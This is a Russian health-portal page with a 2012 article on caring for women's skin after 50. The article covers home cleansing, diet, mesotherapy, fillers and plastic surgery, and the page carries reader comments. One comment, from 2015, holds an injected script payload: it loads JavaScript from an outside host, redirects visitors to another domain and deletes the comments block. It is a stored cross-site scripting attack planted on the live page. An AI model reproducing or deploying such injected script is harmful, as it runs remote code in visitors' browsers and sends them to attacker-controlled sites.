Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кожа женщины после 50 лет  >>  Кожа женщины после 50 лет
 
Обратная связь
 

Кожа женщины после 50 лет

Размер шрифта
16 мая 2012 10:00
  • google_analytics: false
  • Нравится

Возраст 50 лет это полувековой юбилей и начало новой жизни женщины. Уход за кожей в этот период приобретает особое значение, и, если знать точно, что делать, то можно и в 50 лет выглядеть безупречно.

Общие положения

Процесс старениия после 50 лет чаще всего связан с уменьшением содержания влаги в коже, кожа становится сухой и тонкой, сдвигается уровень pH в щелочную сторону, кожа плохо насыщается кислородом и питательными веществами. Значительным фактором, влияющим на состояние кожи в этом возрасте является гормональная перестройка, иначе говоря, - климакс. Уровень эстрогенов снижается, что оказывает неблагоприятное влияние на кожу. Именно в этот период так важен тандем косметолога и гинеколога-эндокринолога. Но, медицина и косметология за последние годы шагнули далеко вперед ,и сейчас существует множество различных методов и процедур, позволяющих женщине выглядеть прекрасно в любом возрасте.

Домашний уход

Особое внимание необходимо уделить уходу за кожей в домашних условиях:

Очищение кожи проводится только натуральными средствами (масла, отвары трав, минеральная вода). Хороший тонизирующий эффект дает использование кубиков льда на основе настоев из лекарственых растений (мята, ромашка, шалфей, лепестки розы, мальвы).

Особое внимание необходимо обратить на подбор косметических средств, которыми пользуетесь. Предпочтение лучше отдать современной космецевтике, которую поможет подобрать косметолог. Выбирать лучше средства с повышенным содержанием витаминов С и Е, гликолевой кислотой и ретиноидами, благодаря которым активно происходит обновление кожи. Особо хочется отметить сыворотки, которые используются курсами и в своем составе имеют повышенное содержание биоактивных веществ. Средства для защиты кожи от солнечных лучей предпочтительно использовать круглогодично и выбирать максимальный фактор защиты SPF +50. Летние кремы должны быть с легкой текстурой, а вот зимние - с более плотной, выполняя одновременно роль и защиты, и питания.

В зрелом возрасте организму требуется уделять повышенное внимание к питанию. Особенно в питьевом режиме, т.к. недостаток влаги сразу отражается на состоянии кожи. Необходимо пить больше свежевыжатых соков, чистой воды. Немаловажное значение играет и употребление специальных добавок к пище, содержащих повышенное количество различных полезных веществ, необходимых женщине в этом возрасте. В ежедневный рацион включайте побольше зелени, рыбы, орехов и кисломолочных продуктов. И самое необходимое - это полноценный сон и физические нагрузки.

Профессиональный уход

В кабинете косметолога рекомендуется проходить курс массажа для лица не менее двух раз в год. Это хорошо подтягивает мышцы лица, снимает отечность и пастозность кожи и успокаивает.

Не секрет, что в возрасте 50 лет лицо начинает терять четкие контуры и кажется усталым, начинают появлятся яркие пигментные пятна. Восстановить упругость и эластичность кожи помогут курсы мезотерапии, а также проведение химических пилингов на основе трихлоруксусной кислоты.

Уколы красоты - инъекции ботулотоксинов (Ксеомин) и филлеров на основе гиалуроновой кислоты (Белотеро) или на основе гидроксиапатита кальция (Радиес) так же рекомендованы в этом возрасте. Они быстро и эффективно вернут лицу четкое очертание (овал лица), разгладят морщины и устранят дряблость кожи.

Из более радикальных методов можно рекомендовать пластическую хирургию. Отличные результаты дает блефаропластика (удаление избытка жировой ткани верних и нижних век), лазерная шлифовка кожи (выравнивание поверхностного рельефа кожи и стимуляция роста молодых клеток), круговая подтяжка лица (хирургический лифтинг). Все эти методы являются действенными, но требуют некоторого реабилитационного периода. А вот результаты замечательные и надолго.

И самое главное, как сказал Монтескье, у женщины есть только одна возможность быть красивой, но быть привлекательной - есть сто тысяч возможностей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Надежда

02 октября 2013 в 10:41

Цитировать   |   Пожаловаться

Пользуюсь кремами и сывороткой "Код молодости", подходит ли он для моего возраста?

2 - zzzzzz

30 июня 2015 в 23:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Moriyka

10 августа 2016 в 22:21

Цитировать   |   Пожаловаться

Когда веки начинают нависать, уже не справиться никакими кремами! Все больше в последнее время задумываюсь о блефаропластике, у нас в знакомая (ей вот уже 53) делала подтяжку у Дикарева, результат оч классный.

Статьи

       
Почему у вас сохнут губы   Новогодние подарки для вашей кожи   Что делать с сухой кожей?   Проблемы с красотой после 40, о которых никто вам не рассказывал  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 11 сентября 2012Солнечные ожоги снижают риск рака кожи!
 
16 февраля 2012Умная повязка для ран 13 февраля 2012Солнце провоцирует гиперпигментацию
 

Слайдшоу

1
Что есть зимой для кожи
Вы неправильно моете лицо! Как надо?
Как сэкономить с помощью крема

Тесты

1
Как выявить контактный дерматит?
Мифы о прыщах
Профессиональный оценщик кожи
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.